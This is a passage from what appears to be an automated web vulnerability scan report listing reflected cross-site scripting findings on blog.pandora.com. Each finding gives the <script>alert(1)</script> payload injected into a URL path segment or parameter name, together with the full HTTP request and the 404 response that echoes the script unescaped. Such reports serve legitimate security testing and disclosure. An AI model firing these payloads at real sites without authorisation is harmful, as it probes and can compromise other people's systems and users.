GET /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cc949<script>alert(1)</script>5818dec138e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cecee<script>alert(1)</script>65ebaa61d8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fd5b<script>alert(1)</script>50186e33060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 795e1<script>alert(1)</script>4beca333580 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc6a7<script>alert(1)</script>380f8df8738 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 893eb<script>alert(1)</script>a835002da8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a128f<script>alert(1)</script>9b5600a0222 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa26<script>alert(1)</script>ccd92788417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb0a1<script>alert(1)</script>2021562e58c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2316c<script>alert(1)</script>13ece1ff165 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da3b3<script>alert(1)</script>63dacbe980f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3aeff<script>alert(1)</script>0e35543ed97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9922b<script>alert(1)</script>9d05ca919c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7cce4<script>alert(1)</script>41d4a417f15 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b0096<script>alert(1)</script>86b16cd0066 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 was not found on this server.</p> ...[SNIP]...
3.442. http://blog.pandora.com/pandora/assets_c/2010/11/North [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://blog.pandora.com
Path: /pandora/assets_c/2010/11/North
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload def5f<script>alert(1)</script>cbc7e5829ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 357
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75284<script>alert(1)</script>22efa64e34f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e532<script>alert(1)</script>7e0d5f16878 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1697<script>alert(1)</script>1beb0083bf8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
